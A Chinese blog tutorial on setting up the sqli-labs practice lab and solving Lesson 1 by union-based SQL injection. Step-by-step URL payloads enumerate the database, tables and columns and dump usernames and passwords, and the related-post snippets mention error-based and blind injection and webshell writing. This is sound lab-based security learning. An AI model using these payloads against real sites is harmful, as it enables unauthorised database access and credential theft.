sqli-labs学习sql注入

最新推荐文章于 2024-09-02 17:00:29 发布
最新推荐文章于 2024-09-02 17:00:29 发布
阅读量333 收藏 1
点赞数 1
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46041723/article/details/104498282
版权

sqli-labs的安装和配置

下载sqli-labs和phpstudy(注意PHP study版本不能高于8.0,不然容易出错,本人就是PHP study版本高了,一直出错)
下载完成后将sqli-labs解压放在PHP study的WWW文件夹下
在这里插入图片描述
打开sqli-labs-master\sql-connections,在里面有一个db-creds.inc文档,打开编辑
在这里插入图片描述
一般默认用户名、密码都是root,更改过的话输入自己更改后的就行。接下来浏览器输入http://localhost/sqli-labs-master打开
在这里插入图片描述
点击Setup/reset Database for labs
在这里插入图片描述
出现这个就代表成功了。

联合查询注入法

在sql注入时应该记住的一些东西
information_schema库存放了所有库的信息
information_schema.columns包含了所有表的字段
table_name表名
table_schema数据库名
column_name列名
information_schema.tables包含所有库的表名
group_concat()函数能将相同的行组合起来,省老事了。

联合查询注入的原理
联合查询注入的前提就是要有显示位(通过查询从数据库返回到页面的内容)。
因本人为萌新一枚,在这里就以sqli-labs(一)为例子进行说明。
打开网站,进入Lesson 1
在这里插入图片描述
1、判断注入点
闭合符号一般是’、"、’)、")或者没有闭合符号,而注释符号一般是 --+
在搜索框内输入?id=1’,发现提示错误。
在这里插入图片描述
用注释符号–+注释后发现正常

在这里插入图片描述
说明注入点是单引号’
2、判断列数
在输入框内输入id=1,2,3;时,均有不同的数据返回。然后输入

http://http://localhost/sqli-labs-master/Less-1/?id=1' order by 4 --+

发现
在这里插入图片描述
说明一共有三列
3、联合查询开始
输入

?id=0' union select 1,2,3 --+

在这里的意思是将id的值等于一个在数据库中不存在的数,通过联合查询可以看出输入的数据会在哪里显示出来。
在这里插入图片描述
结果显示出了2 3的位置,所以在2 3位置我们便可以输入我们想用的句子。
爆数据库
爆数据库时可以通过一个**database()**语句来查看当前的数据库

?id=0' union select 1,database(),3 --+

在这里插入图片描述
爆数据表
在上面说的一些语句,这里就要用到了
既然是爆数据表,首先就需要一个group_concat()函数加一个数据表名table_name,然后还需要指定一个来源,而来源就是所有库的表名从上面爆出来的数据库中

?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

在这里插入图片描述
爆字段

?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

在这里插入图片描述
爆值

?id=0' union select 1,group_concat(username,0x3a,password),3 from users --+

在这里插入图片描述
这样,值就被爆出来了!
后续更改:
改正了之前文章编辑时的错误。

sql-labs
第二关:闭合符号:'
第三关闭合符号:')
第四关闭合符号:")
墨子轩、
关注
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs
【精选详细】sql-labs通关(SQL注入11-25)
weixin_67832625的博客
07-28 1444
sqli-labs靶场适合于初学sql注入的新手,它包含了许多的场景和模式为练习者提供良好的练习平台,以下这些语句搞懂我们做靶场就如鱼得水,非常自信的可以完成。
毕业实习(五)SQL注入sqli-labs靶场
最新发布
Nightwiggle的博客
09-02 2096
1.信息收集:识别目标应用的输入点(如表单字段、URL参数、HTTP头部等),并了解应用的数据库类型和结构。2.测试点注入:在输入字段中尝试插入简单的SQL注入payload(如`' OR '1'='1`),观察应用的响应来确定是否存在SQL注入漏洞。3.确定注入类型:-错误基于注入:观察SQL错误消息,推测数据库结构。-盲注:通过不同的响应时间或页面行为判断数据库内容(如时间延迟注入)。
Sql注入Sqli)
qq_36737214的博客
11-30 638
前言: 前辈给的例子,我们进行分析 目录大纲代码结合实际场景分析1、 产生注入语句解决方法:使用PreparedStatement转义需手动解决的问题防止 %23出现问题 大纲 思维导图地址 代码结合实际场景分析 SQL注入 攻 击 只 对 Statement有效, 对 PreparedStatement 是无效的 1、 产生注入语句 核心代码 Statement statement = con.createStatement(); String sql = "s
sqli-labs(POST类型注入)
weixin_45626840的博客
04-23 213
思路和前些关的联合注入一样,只不过payload构造和回显内容是通过抓包修改与查看
sqli-labs-master.zip sql注入学习靶机
01-18
sql注入学习靶机,由于github经常挂,这里特提供大家下载。
phpstudy+靶场sqli-labs-master下载
11-08
6. **Sqli-Labs实战**:熟悉靶场的结构,逐级破解每个级别的挑战,通过实践学习如何识别和利用SQL注入漏洞,以及如何防止此类攻击。 7. **安全编程**:学习如何在PHP中编写安全的代码,如使用预编译语句(PDO或...
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
PHP、Apache 环境中部署 sqli...sqli-labs 是一个非常有用的工具,帮助用户学习和实践 SQL 注入的技术。通过部署 sqli-labs,用户可以在 PHP 和 Apache 环境中实践 SQL 注入的技术,从而提高自己的安全意识和防御能力。
sqli-labs(php7.3以上可运行)
01-29
"sqli-labs"是一个专为学习和测试SQL注入漏洞而设计的开源平台,尤其适用于PHP7.3及更高版本的环境。 一、SQL注入基础 SQL注入是由于应用程序没有正确地过滤或验证用户输入的数据,导致这些数据可以直接被解释为SQL...
sqli-labs笔记(3)post注入、报错注入、双注入
weixin_43798683的博客
04-22 307
less 11 单引号报错’’’ and password=’’ LIMIT 0,1 猜测后台语句为select ? where uname = '?' and passwd = '?' 构造' or 1 #登陆成功 那在post注入中如何获取数据库中的内容呢 根据报错内容获取内容 报错注入 函数extractvalue(key1,key2): 使用xpath语句key2,...
sqli-labs(十)(过滤注释符)
weixin_30847939的博客
08-29 143
第二十三关: 这关还是一个GET型、字符串、单引符号、的有报错的sql注入,输入?id=1' ,页面会报错 我们继续按照之前的套路来,先输入?id=1' or '1'='1 页面正常显示,说明这个地方又很有可能存在sql注入。继续输入?id=1' or '1'='1' %23 发现页面居然报错,从报错信息中发现我们的注释符居然没了,说明后台对注释符中做了过滤。 像这种情况...
SQL注入SQLI-LABS靶场通关秘籍
Sunnie_yoo的博客
07-03 1473
反之,参数不符合规范,则会触发报错,我们就是利用这个,通过 updatexml() 函数的报错回显我们需要的信息。注入流程与 Less-5 类似,不过这里的判断标准不是回显的信息,而是响应时间。因此网页存在字符型注入漏洞,并且使用单引号和括号进行闭合,注意到此网页并没有返回任何信息,我们需要使用 Bool 盲注进行注入。注入万能密码试试,用户名随便写点东西,使用 OR 运算符构造恒真条件,使用“#”注释掉后面的内容注入,网页提示我们注入成功,由于此时使用的时单引号闭合,因此这里是字符型注入。
sqli-labs—————Sql注入之盲注讲解
Fly_鹏程万里
05-08 2225
盲注何为盲注?盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。盲注分为三类•基于布尔SQL盲注•基于时间的SQL盲注•基于报错的SQL盲注1、基于布尔SQL盲注————构造逻辑判断我们可以利用逻辑判断进行截取字符串相关函数解析  http://blog.csdn.net/Fly_hps/article...
sqli-lab教程Less-7
Brucye
03-23 494
Less-7 将一句话木马写入目录中,使用中国菜刀连接,拿到shell。 1.开启写入权限 使用show variables like '%secure%'在MySQL命令行中判断 show variables like '%secure%'; 如果这里为Null就没有写入权限 2.如何修改本地写入权限 通过修改 MySQL 下的 my.ini 配置文件就可以启用权限,需要把下面这个字符串写入文件中。 secure_file_priv="/" 再次查看此参数,若参数值不为 null 则修改成功。 3
SQL注入 sqli-labs部分解析
ziwenya的博客
08-31 662
sql注入基础操作及相关sqli-labs关卡通关流程
sql注入sqli-labs靶场前几关讲解
m0_70483044的博客
01-09 2088
sql注入简介SQL注入是一种常见的web安全漏洞。sql注入是通过恶意的sql查询或者添加语句插入到应用的输入参数中,再在后台sql服务器解析执行进行的攻击。sql注入原因在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的"数据"拼接到SQL语句中,被当作是SQL语句的一部分执行,从而导致数据库受损。是目前黑客对数据库进行攻击的最常用手段之一。sql注入攻击对象数据库漏洞原因分析web分别前端和后端,前端负责进行展示后端负责处理来自前端的请求并提供前端展示的资源。
Sqli-Lab靶场中SQL注入实际操作使用的注释符与数据库中使用的注释符的不同
大大大蜜蜂的博客
10-05 1555
注释原理解释 执行的sql语句: select name from usertest where id=1 – 注释测试 执行的sql语句: select name from usertest where id=1 #注释测试 执行的sql语句: select name from usertest where id=1 /注释测试/ URL:http://www.sqllab.com/Less-1/?id=-1’ union select 1,database(),3 # UR
PHP与Apache环境下部署SQL注入靶场sqli-labs指南
在PHP和Apache环境中部署sqli-labs是一个重要的步骤,它提供了实践SQL注入攻击防护的学习平台。sqli-labs是一个开源的工具,专为PHP开发者设计,用于模拟和测试SQL注入漏洞,帮助提高安全意识和技能。 首先,确保你...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值